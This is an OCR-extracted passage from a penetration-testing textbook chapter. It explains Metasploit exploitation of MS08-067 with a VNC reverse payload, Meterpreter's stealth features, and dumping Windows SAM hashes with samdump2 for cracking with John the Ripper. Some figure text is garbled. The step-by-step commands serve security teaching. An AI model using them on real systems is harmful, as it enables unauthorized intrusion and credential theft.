5006We will review the details of each of these in just a few moments but before
5007that, let us review the basics of Metasploit terminology. As mentioned earlier,
5008an exploit is a prepackaged collection of code that gets sent to a remote system.
5009This code causes some atypical behavior on the target system that allows us to
5010execute a payload. Recall that a payload is also a small snippet of code that is
5011used to perform some task like installing new software, creating new users, or
5012opening backdoors to the system.
5013
5014Exploits are the weaknesses that allow the attacker to execute remote code
5015(payloads) on the target system. Payloads are the additional software or func-
5016tionality that we install on the target system once the exploit has been success-
5017fully executed.
5018
5019Now that we have an understanding of how to access and start the Msfconsole
5020and a solid understanding of the terminology used, let us examine how we
5021can use Metasploit. When first hearing about and using Metasploit, a common
5022mistake of would-be hackers and penetration testers is the lack of organization
5023and thoughtfulness. Remember, Metasploit is like a scalpel, not a hatchet. Or
5024maybe more appropriately, Metasploit is like a Barrett M107 sniper rifle, not a
5025M60 machine gun. Most newcomers are overwhelmed by the sheer number of
5026exploits and payloads; and usually get lost trying to find appropriate exploits.
5027They spend their time blindly throwing every exploit against a target and hop-
5028ing that something sticks. Later in this chapter, we will examine a tool that
5029works in this manner but for now we need to be a little more refined.
5030
5031Rather than blindly spraying exploits at a target, we need to find a way to match
5032up known system vulnerabilities with the prepackaged exploits in Metasploit.
5033Once you have learned this simple process, owning a vulnerable target becomes
5034a cinch. In order to correlate a target's vulnerabilities with Metasploit's exploits,
5035we need to review our findings from step 2. We will start this process by focus-
5036ing on the Nessus output. Recall that Nessus is a vulnerability scanner and
5037provides us with a list of known weaknesses or missing patches. When review-
5038ing the Nessus output, you should make notes of any findings but pay special
5039attention to the vulnerabilities labeled as "High." Many "High" Nessus vulner-
5040abilities, especially missing Microsoft patches, correlate directly with Metasploit
5041exploits.
5042
5043Assume that during your penetration test you uncovered a new target at IP
5044address 172.16.45.130. Running Nmap tells you that your new target is a
5045Windows XP machine with Service Pack 3 installed. Continuing on with step 2,
5046we run Nessus against the target. Figure 4.3 shows the Nessus report for
5047172.16.45.130. Notice there are two "High" findings.
5048
5049It is possible to drill down into each of the "High" findings to get the specific
5050information from Nessus. Double clicking on the first "High" finding reveals
5051the source of this issue is a missing patch. Specifically, Microsoft patch MS08-
5052067 has not been installed on the target machine. Clicking on the second
5053
5054
5055
5056The Basics of Hacking and Penetration Testing
5057
5058
5059
5060
5061FIGURE 4.3
5062
5063Nessus Output Showing Two "High" Findings.
5064
5065
5066
5067I 139 flop
5068
5069
5070
5071| flugkio Hunt
5072
5073X OS Wnufcilon
5074
5075| 2S220 rc? ir T n«UfrjsSi;[ip^«l
5076
5077I 200W VM«jrt VAj*l u«h)nt DohKKn
5078
5079
5080
5081wi* y&7 ueoson wrari G^te dtr!!*c BpG H^u«)
5082
5083
5084
508545550 Comrngo PUt)onn Enunwution (CPE)
5086
5087SS716 EWnvd art twid
5088
5089
5090
5091FIGURE 4.4
5092
5093Screenshot Showing Missing Patch MS08-067 on the Target.
5094
5095
5096
5097"High" vulnerability discovered by Nessus reveals another missing Microsoft
5098patch. This vulnerability is the result of missing Microsoft patch MS09-001.
5099Figure 4.4 highlights the Nessus report showing missing patch MS08-067.
5100
5101At this point, we know our target has two missing patches. Both of these
5102patches are labeled as "High" and the descriptions that Nessus provides for
5103both missing patches mention "remote code execution." As an attacker your
5104heartbeat should be racing a little at this point, because the chances are very
5105good that Metasploit will be able to exploit the target for us.
5106
5107Next we need to head over to Metasploit and look for any exploits pertaining
5108to MS08-067 or MS09-001. Once we have started Metasploit (and updated),
5109we can use the "search" command to locate any exploits related to our Nessus
5110findings. To accomplish this, we issue the "search" command followed by the
5111missing patch number. For example, at the "MSF> " prompt you would type:
5112
5113msf > search ms08-067
5114
5115Once the command is completed, make detailed notes on the findings and
5116search for any other missing patches. Metasploit will search through its infor-
5117mation and return any relevant information it finds. Figure 4.5 shows the out-
5118put of searching for MS08-067 and MS09-001 within Metasploit.
5119
5120
5121
5122Exploitation CHAPTER 4
5123
5124
5125
5126Shell - Msf con sole
5127
5128
5129
5130Soislori Ed>L Vimw Bookmitk-, Settings Hefp
5131
5132
5133
5134Oil *
5135
5136lit > search â– vt:=
5137
5138I*] Searching Ipadeu nodules for pattern ,
5139
5140
5141
5142Naa* Rank rescript ion
5143
5144windowt/iflb/aiOt W57 nttipl grtat Htffoioft Strytr
5145
5146
5147
5148■if > ■.«■-.,-■!- -■04 Ml
5149
51501*1 Starching loiW ncdul** for pattern 'ftie9-Wl ..
5151
5152
5153
5154Utiw P*th Stick Corruption
5155
5156
5157
5158')oi / w i Mow * / i*b/i
5159
5160
5161
5162â– S09 601 writ
5163
5164
5165
5166Rank Oc*cripli'
5167
5168
5169
5170te ciDraal Microsoft sflV.iVb Wntf-AndX Invalid Dataflf f set
5171
5172
5173
5174FIGURE 4.5
5175
5176Finding a Match between Nessus and Metasploit with the Search Function.
5177
5178
5179
5180Let us review the output from Figure 4.5:
5181
5182â– We started by issuing the "search" command followed by the specific miss-
5183ing patch that Nessus discovered.
5184
5185â– After searching, Metasploit found a matching exploit and provided us with
5186several pieces of information about the exploit.
5187
5188• First it provided us with a name and location; "windows/smb/
5189ms08_067_netapi."
5190
5191• Next Metasploit provided us with a "Rank."
5192
5193It is important to pay close attention to the exploit rank. This information pro-
5194vides details about how dependable the exploit is (how often the exploit is suc-
5195cessful) as well as how likely the exploit is to cause instability or crashes on the
5196target system. Numerically the higher an exploit is ranked, the more likely it
5197is to succeed and the less likely it is to cause disruptions on the target system.
5198Metasploit uses seven ratings to rank each exploit:
5199
52001. Manual
5201
52022. Low
5203
52043. Average
5205
52064. Normal
5207
52085. Good
5209
5210
5211
5212ALERT!
5213
5214
5215
5216The Metasploit "search" feature can also be used to locate non-Microsoft exploits.
5217Nessus reports will often include a CVE or BID number to reference critical
5218vulnerabilities. If you are unable to locate a missing MS patch or are conducting
5219a penetration test against a non-Microsoft product, be sure to search for matching
5220exploits by CVE or BID numbers! Look for these in your Nessus scan report.
5221
5222
5223
5224The Basics of Hacking and Penetration Testing
5225
5226
5227
52286. Great
5229
52307. Excellent
5231
5232You can find more information and a formal definition of the ranking meth-
5233odology on the Metasploit.com website. Finally, the Metasploit search feature
5234presents us with a brief description of the exploit providing us with additional
5235details about the attack. When all other things are held equal, you should
5236choose exploits with a higher rank, as they are less likely to disrupt the normal
5237functioning of your target.
5238
5239Now that you understand how to match up vulnerabilities in Nessus with
5240exploits in Metasploit and you have the ability to choose between two or more
5241Metasploit exploits, we are ready to unleash the full power of Metasploit on
5242our target.
5243
5244Continuing with our example, we will use the MS08-067 because it has a
5245higher ranking. In order to run Metasploit, we need to provide the framework
5246with a series of commands. Because Metasploit is already running and we have
5247already found our exploit we continue by issuing the "use" command in the
5248"msf> " terminal to set the desired exploit.
5249
5250msf > use wi ndows/smb/ms08_067_netapi
5251
5252This command tells Metasploit to use the exploit that Nessus identified. Once
5253we have the exploit loaded, we need to view the available payloads. This is
5254accomplished by entering "show payloads" in the "msf>" terminal.
5255
5256msf > show pay 1 oads
5257
5258This will list all the available and compatible payloads for the exploit you have
5259chosen. To select one of the payloads, we type "set payload" and the payload
5260name into the "msf>" terminal.
5261
5262msf > set payload windows/vncinject/reverse_tcp
5263
5264There are many, many payloads to choose from. A full examination of the dif-
5265ferent payloads is outside the scope of this book. Please review the Metasploit
5266documentation for details on each of the available payloads. For this example,
5267we will install VNC on the target machine and then have that machine connect
5268back to us. If you are unfamiliar with VNC, it is remote control PC software
5269that allows a user to connect to a remote machine, view the remote machine,
5270and control the mouse and keyboard as if you were physically sitting at that
5271machine. It works much the same as Remote Desktop or a Terminal Server.
5272
5273It is important to note that the VNC software is not currently installed on the tar-
5274get machine. Remember that some exploits give us the ability to install software
5275on our target machine. In this example, we are sending an exploit to our target
5276machine. If successfully executed, the exploit will call the "install vnc" payload and
5277remotely install the software on the victim machine without any user interaction.
5278
5279Different payloads will require different additional options to be set. If you fail
5280to set the required options for a given payload, your exploit will fail. There are
5281
5282
5283
5284Exploitation CHAPTER 4
5285
5286
5287
5288few things worse than getting this far and failing to set an option. Be sure to
5289watch this step closely. To view the available options, issue the "show options"
5290in the "msf>" terminal:
5291
5292msf > show opti ons
5293
5294After issuing the show options command, we are presented with a series of
5295choices that are specific to the payload we have chosen. When using the "win-
5296dows/vncinject/reverse_tcp" payload, we see that there are two options that
5297need to be set because they are missing any default information. The first is
5298"RHOST" and the second is "LHOST." RHOST is the IP address of the remote
5299host and LHOST is the IP address you are attacking from. To set these options,
5300we issue the "set optionname" command in the msf> terminal:
5301
5302msf>set RHOST 172.168.45.130
5303msf>set LHOST 172.168.45.135
5304
5305Now that you have required options set, it is usually a good idea at this point
5306to reissue the "show options" command to ensure you are not missing any
5307information.
5308
5309msf > show opti ons
5310
5311Once you are sure you have entered all the information correctly, you are ready
5312to launch your exploit. To send your exploit to the target machine, simply type
5313"exploit" into the "msf>" terminal
5314
5315msf > expl oi t
5316
5317Now sit back and watch as the magic happens. To truly appreciate the beauty
5318and complexity of what is going on here, you need to build your understanding
5319of buffer overflows and exploitation. This is something that is highly encouraged
5320when you finish the basics covered in this book. Metasploit gives you the ability
5321to stand on the shoulders of giants and the power to launch incredibly complex
5322attacks with just a few commands. You should revel in the moment and enjoy
5323the victory of conquering your target, but you should also commit yourself to
5324learning even more. Commit yourself to really understanding exploitation.
5325
5326/After typing "exploit" Metasploit will go off and do its thing, sending exploits
5327and payloads to the target. This is where the "hacking like Hugh Jackman" part
5328comes in. If you set up everything correctly, after a few seconds you will be pre-
5329sented with a screen belonging to your victim machine. Because our payload in
5330this example was a VNC install, you will have the ability to view and interact with
5331the target machine as if you were physically sitting in front of it. It is hard not to
5332be impressed and even a little bewildered the first time you see (or complete) this
5333exploit in real time. Figure 4.6 shows an example of the completed Metasploit
5334attack. Notice, the computer that launched the attack is the Linux Backtrack, but
5335the attacker machine has full GUI access to the Windows desktop of the victim.
5336
5337Below you will find a cheat sheet of the steps required to run Metasploit
5338against a target machine.
5339
5340
5341
5342The Basics of Hacking and Penetration Testing
5343
5344
5345
5346
5347FIGURE 4.6
5348
5349Screenshot Showing Successful Exploit of Windows Target.
5350
53511. Start Metasploit:
5352
5353a. Open a terminal and issue the following command /pentest/exploits/
5354framework3/msfconsole
5355
53562. Issue the "search" command to search for exploits:
5357a. msf > search missing_patch_number
5358
53593. Issue the "use" command to select the desired exploit:
5360a. msf > use exploit_name_and_path_as_shown_in_2a
5361
53624. Issue "show payloads" command to show available payloads:
5363a. msf > show payloads
5364
53655. Issue "set" command to select payload
5366
5367a. msf > set payload path_to_payload_as_shown_in_4a
5368
53696. Issue "show options" to view any options needing to be filled out before
5370exploiting the target
5371
5372a. msf > show options
5373
53747. Issue the "set" command for any options listed in 6a
5375a. msf > set optionname desired_option_input
5376
53778. Issue "exploit" command to launch exploit against target
5378a. msf > "exploit"
5379
5380Now that you have a basic understanding of how to use Metasploit, it is impor-
5381tant to review a few more of the basic payloads available to you. Even though
5382the VNC inject is incredibly cool and great for impressing friends, relatives, and
5383coworkers, it is rarely used in an actual PT. In most penetration tests, hackers
5384prefer a simple shell allowing remote access and control of the target machine.
5385Table 4.1 is a list of some basic payloads. Please refer to the Metasploit docu-
5386mentation for a complete list. Remember, one of the powers of Metasploit is
5387the ability to mix and match exploits and payloads. This provides a penetra-
5388tion tester with an incredible amount of flexibility, allowing the functionality
5389
5390
5391
5392Exploitation CHAPTER 4
5393
5394
5395
5396Table 4.1 Sample of Payloads Available for Targeting Windows Machines
5397Metasploit Payload Name Payload Description
5398
5399
5400
5401wi ndows/adduser
5402wi ndows/exec
5403wi ndows/shel l_bi nd_tcp
5404windows/shel l_reverse_tcp
5405windows/meterpreter/bi nd_tcp
5406wi ndows/meterpreter/reverse_tcp
5407wi ndows/vnci nject/bi nd_tcp
5408wi ndows/vnci nject/reverse_tcp
5409
5410
5411
5412Create a new user in the local administrator
5413
5414group on the target machine
5415Execute a Windows binary (.exe) on the target
5416
5417machine
5418
5419Open a command shell on the target machine
5420
5421and wait for a connection
5422Target machine connects back to the attacker
5423
5424and opens a command shell (on the target)
5425Target machine installs the Meterpreter and
5426
5427waits for a connection
5428
5429Installs Meterpreter on the target machine then
5430creates a connection back to the attacker
5431
5432Installs VNC on the target machine and waits
5433for a connection
5434
5435Installs VNC on the target machine and sends
5436VNC connection back to target
5437
5438
5439
5440of Metasploit to change depending on the desired outcome. It is important that
5441you become familiar with the various payloads available to you.
5442
5443Many of these same payloads exist for Linux, BSD, OSX, and other operating
5444systems. Again, you can find the full details by reviewing the Metasploit docu-
5445mentation closely. One source of confusion for many people is the difference
5446between similar payloads like "windows/meterpreter/bind_tcp" and "win-
5447dows/meterpreter/reverse_tcp." The keyword that causes the confusion here is
5448"reverse. " There is a simple but important difference between the two payloads
5449and knowing when to use each will often mean the difference between an
5450exploit's success or failure. The key difference in these attacks is the direction of
5451the connection after the exploit has been delivered.
5452
5453In a "bind" payload, we are both sending the exploit and making a connection
5454to the target from the attacking machine. In this instance, the attacker sends
5455the exploit to the target and the target waits passively for a connection to come
5456in. After sending the exploit, the attacker's machine then connects to the target.
5457
5458In a "reverse" payload, the attacking machine sends the exploit but forces the
5459target machine to connect back to the attacker. In this type of attack, rather than
5460passively waiting for an incoming connection on a specified port or service,
5461the target machine actively makes a connection back to the attacker. Figure 4.7
5462should make this concept clearer.
5463
5464The last Metasploit topic to discuss is the Meterpreter. The Meterpreter is
5465a powerful and flexible tool that you will need to learn to control if you are
5466going to master the art of Metasploit. The Meta-Interpreter, or Meterpreter, is a
5467
5468
5469
5470The Basics of Hacking and Penetration Testing
5471
5472
5473
5474Bind Payloads
5475
54761) Exploit
5477
5478
5479
5480Attacker Targe!
5481
5482
5483
54842) Connection
5485
5486
5487
5488Reverse Payloads
5489
54901) Exploit
5491
5492
5493
5494Attacker Target
5495
5496
5497
54982) Connection
5499
5500FIGURE 4.7
5501
5502Difference between Bind and Reverse Payloads.
5503
5504
5505
5506payload available in Metasploit that gives attackers a powerful command shell
5507that can be used to interact with their target.
5508
5509Another big advantage of the Meterpreter is the fact that it runs entirely
5510in memory and never utilizes the hard drive. This tactic provides a layer of
5511stealth that helps it evade many anti-virus systems and confounds some foren-
5512sic tools.
5513
5514The Meterpreter functions in a manner similar to Windows cmd.exe or the Linux
5515/bin/sh command. Once installed on the victim machine, it allows the attacker
5516to interact with and execute commands on the target as if the attacker were sit-
5517ting at the local machine. It is very important to understand that the Meterpreter
5518will run with the privileges associated with the program that was exploited. For
5519example, assume that our favorite Network Admin Ben Owned, has disregarded
5520all common sense and is running his IRC program as "root" (the Linux equiva-
5521lent of the Windows "Administrator" account). Unfortunately for Ben, his sys-
5522tem is out-of-date, and during a recent penetration test the attacker was able to
5523exploit Ben's IRC client installing Metasploit's Meterpreter. Because Ben was run-
5524ning the IRC program as the root account, and because the IRC program was
5525exploited by Metasploit, the Meterpreter is now able to function with all the
5526privileges and rights of the "root" account! This is one example in a long list of
5527reasons why it is important to run all of your programs with the most restrictive
5528privileges possible, and avoid running anything as root or administrator.
5529
5530Another reason for using the Meterpreter over a traditional cmd or Linux shell
5531stems from the fact that starting either of these on a target machine often starts
5532a new process that can be detected by a keen user or wily administrator. This
5533means that the attacker raises his or her visibility and chances of detection
5534while interacting with the target machine. Furthermore, both the cmd.exe and /
5535bin/sh provide a limited number of tools and commands that can be accessed.
5536In contrast, the Meterpreter was built from the ground up to be used as sort of
5537
5538
5539
5540Exploitation CHAPTER 4
5541
5542
5543
5544"hacker's cmd" with the ability to access and control the most popular tools
5545and functions needed during a penetration test.
5546
5547The Meterpreter has many great features that are built in by default. Basic func-
5548tions include the "migrate" command, which is useful for moving the server to
5549another process. Migrating the Meterpreter server to another process is important
5550in case the vulnerable service you attacked is shut down or stopped. Another use-
5551ful function is the "cat" command that can be used to display local file contents
5552on the screen. This is useful for reviewing various files on the target. The "down-
5553load" command allows you to pull a file or directory from the target machine,
5554making a local copy on the attacker's machine. The "upload" command can be
5555used to move files from the attacker's machine to the target machine. The "edit"
5556command can be used to make changes to simple files. The "execute" com-
5557mand can be used to issue a command and have it run on the remote machine,
5558whereas "kill" can be used to stop a process. The following commands are
5559also useful and provide the exact same function as they do on a normal Linux
5560machine: "cd," "Is," "ps," "shutdown," "mkdir," "pwd," and "ifconfig."
5561
5562Some of the more advanced features include the ability to extract password
5563hashes through the SAM Juicer tool, the ability to interact with a ruby shell, the
5564ability to load and execute arbitrary DLLs on the target, and even the ability to
5565lock out the local keyboard and mouse!
5566
5567As you can see, gaining access to a Meterpreter shell is one of the most power-
5568ful, flexible, and stealthy ways that an attacker can interact with a target. It is
5569well worth your time to learn how to use this handy tool.
5570
5571JOHN THE RIPPER: KING OF THE PASSWORD
5572CRACKERS
5573
5574It is hard to imagine discussing a topic like the basics of hacking without dis-
5575cussing passwords and password cracking. No matter what we do or how far
5576we advance, it appears that passwords remain the most popular way to protect
5577data and allow access to systems. With this in mind, let us take a brief detour
5578to cover the basics of password cracking.
5579
5580There are several reasons why a penetration tester would be interested in crack-
5581ing passwords. First and foremost, this is a great technique for elevating and
5582escalating privileges. Consider the following example: assume that you were
5583able to compromise a target system but after logging in you discover that you
5584have no rights on that system. No matter what you do, you are unable to read
5585and write to the target's files and folders and even worse, you are unable to
5586install any new software. This is often the case when you get access to a low
5587privileged account belonging to the "user" or "guest" group.
5588
5589If the account you accessed has no or few rights, you will be unable to per-
5590form many of the required steps to further compromise the system. I have actu-
5591ally been involved with several Red Team exercises where seemingly competent
5592hackers are at a complete loss when presented with an unprivileged account.
5593
5594
5595
5596The Basics of Hacking and Penetration Testing
5597
5598
5599
5600f \
5601
5602
5603
5604ALERT!
5605
5606
5607
5608Password Hint #1: Never, never, never use the same password for your local machine
5609administrator as you do for your domain administrator account.
5610V '
5611
5612They throw up their hands and say "Does anyone want unprivileged access to
5613this machine? I don't know what to do with it." In this case, password crack-
5614ing is certainly a useful way to escalate privileges and often allows us to gain
5615administrative rights on a target machine.
5616
5617Another reason for cracking passwords and escalating privileges is that many
5618of the tools we run as penetration testers require administrative-level access in
5619order to install and execute properly. It is not uncommon for penetration tes-
5620ters to find themselves in a situation where they were able to crack the local
5621administrator password (the local admin account on a machine) and have
5622this password turn out to be the exactly same password that the Network
5623Administrator was using for the domain administrator account.
5624
5625If we can access the password hashes on a target machine, the chances are good
5626that with enough time, John the Ripper (JtR), a password-cracking tool, can
5627discover the plaintext version of a password. Password hashes are ... and can
5628be accessed remotely or locally. Regardless of how we access the hash file, the
5629steps and tools required to crack the passwords remain the same. In its most
5630basic form, password cracking consists of two parts:
5631
56321. Locate and download the target system's password hash file.
5633
56342. Use a tool to convert the hashed (encrypted) passwords into a plaintext
5635password.
5636
5637Most systems do not store your password as the plaintext value you enter, but
5638rather they store an encrypted version of the password. This encrypted version
5639is called a hash. For example, assume you pick a password "qwerty" (which is
5640obviously a bad idea). When you log into your PC, you type your password
5641"qwerty" to access the system. However, behind the scenes your computer is
5642actually calculating and checking an encrypted version of the password you
5643entered. This encrypted version or hash of your password appears to be a ran-
5644dom string of characters and numbers.
5645
5646Different systems use different hashing algorithms to create their password
5647hashes. Most systems store their password hashes in a single location. This
5648hash file usually contains the encrypted passwords for several users and sys-
5649tem accounts. Unfortunately, gaining access to the password hashes is only
5650half the battle because simply viewing or even memorizing a password hash
5651(if such a thing were possible) is not enough to determine the plaintext. This
5652is because technically it is not supposed to be possible to work backward from
5653a hash to plaintext. By its definition, a hash, once encrypted, is never meant to
5654be unencrypted.
5655
5656
5657
5658Exploitation CHAPTER 4
5659
5660
5661
5662Consider the following example. Assume that we have located a password
5663hash and we want to discover the plaintext value. It is important to understand
5664that in most cases we need the plaintext password, not the hashed password.
5665Entering the hashed value into the system will not get us access because this
5666would simply cause the system to hash the hash (which is obviously incor-
5667rect). In order to discover the plaintext version of a password, we need to circle
5668through a series of steps.
5669
5670First we select a hashing algorithm, next we pick a plaintext word, third we
5671encrypt the plaintext word with the hashing algorithm, and finally we compare
5672the output or hash of the chosen word with the hash from our target. If the
5673hashes match we know the plaintext password because no two different plain-
5674text words should produce the exact same hash.
5675
5676Although this may seem like a clumsy, awkward, or slow process for a human,
5677computers specialize in tasks like this. Given the computing power available
5678today, completing the four-step process outlined above is trivial for a modern
5679machine. The speed at which John the Ripper can generate password hashes
5680will vary depending on the algorithm being used to create the hashes and the
5681hardware that is running John the Ripper. It is safe to say that even an average
5682computer is capable of generating millions of Windows (LM) password guesses
5683every second. John the Ripper includes a nifty feature that allows you to bench-
5684mark your computer's performance. This benchmark will be measured in
5685cracks per second (c/s). You can run this by navigating to the following direc-
5686tory /pentest/passwords/jtr and running the following command:
5687
5688./John --test
5689
5690This will provide you with a list of performance metrics and let you know how
5691efficient your system is at generating guesses based on your hardware and the
5692algorithm being used to hash the passwords.
5693
5694Before we can crack passwords, we first have to locate the password hash file.
5695As mentioned earlier, most systems store the encrypted password hashes in a
5696single location. In Windows-based systems, the hashes are stored in a special
5697file called the SAM (Security Account Manager) file. On NT-based Windows
5698systems including Windows 2000 and above, the SAM file is located in the C:\
5699Windows\System32\Config\ directory. Now that we know the location of the
5700SAM file, we need to extract the password hashes from the file. Because the
5701SAM file holds some very important information, Microsoft has wisely added
5702some additional security features to help protect the file.
5703
5704First the SAM file is actually locked when the operating system boots up. This
5705means that while the OS is running we do not have the ability to open or copy
5706the SAM file. In addition to the lock, the entire SAM file is encrypted and not
5707viewable.
5708
5709Fortunately, there is a way to bypass both of these restrictions. On a remote
5710machine, we can use the Meterpreter and SAM Juicer to access the hashes on a live
5711target. If we have physical access to the system, we can also boot to an alternate
5712
5713
5714
5715The Basics of Hacking and Penetration Testing
5716
5717
5718
5719operating system like Backtrack. By booting our target to an alternate operating
5720system, we are able to bypass the Windows SAM lock. This is possible because
5721the Windows OS never starts, the lock never engages, and we are free to access the
5722SAM file. Unfortunately the SAM file is still encrypted, so we need to use a tool to
5723access the hashes. Fortunately, the required tool is built into Backtrack.
5724
5725After booting the target system to an alternate operating system, the first thing
5726you need to do is to mount the local hard drive. Be sure to mount the drive
5727containing the Windows folder. We can accomplish this by opening a terminal
5728and typing:
5729
5730mount /dev/sdal /mnt/sdal
5731
5732It is important that you mount the correct drive as not all systems will have
5733a /dev/sdal. If you are unsure about which drive to mount, you can run the
5734"fdisk -1" command. The fdisk tool will list each of the drives available on your
5735target system and should help you determine which drive you need to mount.
5736You may also need to create a mount point in the /mnt directory. To do so, you
5737can simply use the "mkdir" command:
5738
5739mkdir /mnt/sdal
5740
5741If you are unsure about how to use the mount command or locate the proper
5742drive, please review the Linux man pages for the mount command or practice
5743your newly acquired Google skills from step 1 .
5744
5745Once you have successfully mounted the local drive in Backtrack, you will be
5746able to browse the Windows "C:\" drive. You should now be able to navigate to
5747the SAM file. You can do so by typing the following command into a terminal
5748window:
5749
5750cd /mnt/sdal/Windows/system32/config
5751
5752If everything has gone as planned, you should be in the directory containing
5753the SAM file. To view the contents of the current folder issue the "Is" com-
5754mand in the terminal window, you should see the SAM file. Figure 4.8 shows a
5755screenshot displaying each of the steps required to locate the SAM file (assum-
5756ing you have a /mnt/sdal directory already created).
5757
5758In step 1 we issue the "fdisk -1" command to view the available drives on the
5759local disk. In step 2, fdisk responds back by stating that there is a drive at /
5760dev/sdal. In step 3 we use this information to mount the drive into our /mnt/
5761sdal folder so that we can access the local hard drive. Now that our drive is
5762mounted and available, in step 4 we move into the directory containing the
5763SAM file by using the "cd" (change directory) command. In step 5 we verify
5764that we are in the proper directory by issuing the "Is" command to list the con-
5765tents of the current folder. Finally, step 6 shows the SAM file.
5766
5767Now that we have located the SAM file, we can use a tool called Samdump2 to
5768extract the hashes. At this point we have the ability to view and copy the SAM
5769file, in effect overcoming the first security feature, but at this point the SAM
5770
5771
5772
5773Exploitation CHAPTER 4
5774
5775
5776
5777: tt fdisk -1
5778
5779
5780
5781Disk /deu/sda: 17.1 GB, 17173869184 bytes
5782255 heads, 63 sectors^track , 2088 cylinders
5783Units = cylinders of 16065 * 512 = 8225280 bytes
5784Disk identifier: 0xa7baa?ba
5785
5786
5787
5788Dcuicc Boot
5789
5790
5791
5792End Blocks
5793✓deu/sdal """iT 1 2087 16761
5794
5795root0bt:~» rtount ✓deu/sdal ✓mnt/sdaL'' «■■■**
5796rootebt : "8 cd ✓wnt/sdal/U INDDWS/systein32/conf Iqs
5797
5798rootebt:/nnt^sdit1rU!riDnuS/sij^tiin;^/i:[nif kjtt Is
5799ftppEuent.Egt SMI JLIU1 I ill, LUW .SyytUlilil . EUT
5800
5801default SAM. LOG software system
5802
5803default . LOG SecEuent . Ewt software . LOG systen . LOG
5804default, sag SECURITV software, sag I^H^^^H
5805
5806root0bt:/nnt/sdal/UII1DOUS/'syste«32^conf igtt
5807
5808
5809
5810
5811system .sag
5812TempKey.LOG
5813userdif f
5814userd i ff . LOG
5815
5816
5817
5818FIGURE 4.8
5819
5820Locating the SAM File for Password Cracking.
5821
5822
5823
5824file is still encrypted. In order to view an unencrypted copy of the SAM file, we
5825need to run Samdump2. Samdump2 utilizes a file on the local machine called
5826"system" to decrypt the SAM file. Fortunately, the "system" file is located in the
5827same directory as the SAM file.
5828
5829To run Samdump2, we issue the "samdump2" command followed by the name
5830and location of the "system" file, followed by the name and location of the
5831SAM file we want to view. Recall that earlier we had issued the "cd" command
5832to navigate to the Windows/system32/config folder. At this point we can extract
5833the contents of the SAM file by running the following command in a terminal:
5834
5835samdump2 system SAM > /tmp/hashes . txt
5836
5837This will invoke the Samdump2 program and appending the " > hashes.txt"
5838command will save the results to a file called "hashes.txt" in Backtrack's /tmp
5839directory. Figure 4.9 shows a screenshot of the Samdump2 command and dis-
5840plays the contents of the hashes.txt file.
5841
5842Now that we have the password hashes saved, we need to transfer them off the
5843live Backtrack disk. This can be done by simply e-mailing the hashes.txt file
5844to yourself or inserting a thumb drive and creating a local copy of the hashes.
5845Either way, make sure you save the hashes.txt file because you are working off
5846a "live" CD and your changes are not persistent. This means when you reboot
5847the target machine all the files you created in the Backtrack disk will be gone
5848for good!
5849
5850Now that you have a copy of the password hashes, you can begin the process of
5851cracking the passwords. To accomplish this task, we will use a tool called John
5852the Ripper. Like each of the other tools we have examined, John the Ripper is
5853available for free. You can download it by going to http://www.openwall.com/
5854
5855
5856
5857The Basics of Hacking and Penetration Testing
5858
5859
5860
5861tt sandiimp2 systcri Sflfl > /"tnp/hashes.txt
5862
5863niiiinlil :/»int/sd<il.'UIHDtJUS/-syste»32/'conf kji cat /tap/hashes . txt
5864
5865AdNinistrator:5e0:e5Zcac6?HSaSaZZ4a3bl08f3fa6cb6d:8846f?eaec8fbll7ad36bdda36b7586c
5866
5867Guest : 561 : aad3b435b5H04eeaad3b435b51404ee : 31d6cf e3dl&ae931b73c59d7e0c089ce : : :
5868
5869He lpAssistant : 1699 : 4 07ec66fe4cr 365839 Ic3c2e6ccb0f df i b2?ac5cdbb6c282aa31d48e25e4bbd8
5870
58718: : :
5872
5873SUPPOBT_388945aO:lQO2:aad3b435b514O4eeaad3b435b514O')ee:ecbf0CI4dafOBS287b3O75eiecblf
5874b&US: : â– â–
5875
5876tlagtjie : 1003: Bee r76h64cQc4f 6Zaad3b435bS1404ee :7e31f c73c9591Zce95b?436df92e?243 : :
5877«Dlly: 10Q4 :S98ddceZ660d3193aad3b43SbS1404ee :2d20dZ5Za4 , W4aScdf 5el71d93385bf : : :
5878
5879rootUbt : /nnt/sdal'U IMB00S^systefK3Z^coiif Igt
5880
5881
5882
5883FIGURE 4.9
5884
5885Extracting and Viewing the Password Hashes with Samdump2.
5886
5887
5888
5889john. Before we begin utilizing John the Ripper, it is important that you under-
5890stand how Microsoft creates password hashes.
5891
5892Originally Microsoft utilized a hashing algorithm called Lan Manager (or LM
5893for short). LM hashes suffered from several key weaknesses that made password
5894cracking a trivial task. First, when LM hashes are created the entire password
5895is converted to uppercase. Converting all the characters used in a password to
5896uppercase is a fundamental flaw that greatly reduces the strength of any pass-
5897word. This is because technically if we hash the word "Password" and "pass-
5898word," even though they are only different by a single case of a single letter,
5899these two words will produce a different hash output. However, because LM
5900hashes convert every character to upper case, we greatly reduce the number of
5901guesses we need to make. Instead of requiring an attacker to guess "Password,"
5902"Password," "PASsword," and so on, with every possible combination of upper
5903and lower case letters, the attacker only needs to make the single guess of
5904"PASSWORD."
5905
5906To further compound this issue, every Lan Manager password is 14 characters
5907in length. If a password is less than 14 characters, the missing letters are filled
5908in with null values. If a password is greater than 14 characters, the password is
5909truncated at 14 characters.
5910
5911The final nail in the coffin of Lan Manager passwords (as if it needed another)
5912is the fact that all stored passwords, which are now 14 characters in length,
5913actually get split in half and stored as two individual 7-character passwords.
5914The length of a password is one source of its strength; unfortunately because of
5915the LM design, the max password that needs to be cracked is 7 characters. John
5916will actually attempt to crack each of the 7-character halves of the password
5917individually and typically makes very short work out of it.
5918
5919Take a moment to consider these flaws. When taken together, they represent
5920quite a blow to the security of any system. Suppose our favorite Network
5921Admin, Ben Owned is utilizing LM hashes on his Windows machine. He is
5922aware of the dangers of weak passwords so he creates the following password,
5923which he believes is secure: SuperSecretPassword!@#$.
5924
5925
5926
5927Exploitation CHAPTER 4
5928
5929
5930
5931Unfortunately for Ben, he is operating under a false sense of security. His complex
5932password will actually undergo a series of changes that make it much less secure.
5933First the password is converted to all uppercase: SUPERSECRETPASSWORD!@#$.
5934Next the password is truncated to be exactly 14 characters, with any remain-
5935ing letters simply discarded. The new password is: SUPERSECRETPAS. Finally,
5936the password is broken into equal halves of 7 characters each: SUPERSE and
5937CRETPAS.
5938
5939When a hacker or penetration tester gets ahold of Ben's password, the attacker
5940has to crack two simple, all-uppercase, 7-character passwords. That is a drasti-
5941cally simpler task than the original password of SuperSecretPassword!@#$.
5942
5943Fortunately, Microsoft addressed these issues and now uses a much more
5944secure algorithm called NTLM to create its password hashes. However, as a
